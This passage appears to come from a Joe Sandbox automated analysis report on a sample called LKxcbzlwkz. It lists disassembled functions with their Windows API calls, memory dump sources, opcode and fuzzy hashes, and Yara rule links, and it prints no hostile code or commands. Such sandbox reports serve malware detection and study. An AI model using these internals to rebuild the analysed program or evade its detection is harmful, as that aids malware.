                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                                                                                                                                            Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2223660684-0
                                                                                                                                                                                                                                                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                                                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                                                                                                                            Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2783949968-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                                                                                                                            Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                                                                                                            Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                                                                                                                            Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                                                                                                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                                                                                                                                            Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                                                                                                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                                                                                                                                            Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                                                                                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                                                                                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                                                                                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                                                                                                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                                                                                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                                                                                                                                            • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1454798553-0
                                                                                                                                                                                                                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                                                                                                                                            Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                            • String ID: Q\E
                                                                                                                                                                                                                                                            • API String ID: 909875538-2189900498
                                                                                                                                                                                                                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                                                                                                                                            Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                                                                                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                            • API String ID: 2652923123-3941886329
                                                                                                                                                                                                                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                                                                                                                                            Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove_strncmp
                                                                                                                                                                                                                                                            • String ID: U$\
                                                                                                                                                                                                                                                            • API String ID: 2666721431-100911408
                                                                                                                                                                                                                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                                                                                                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
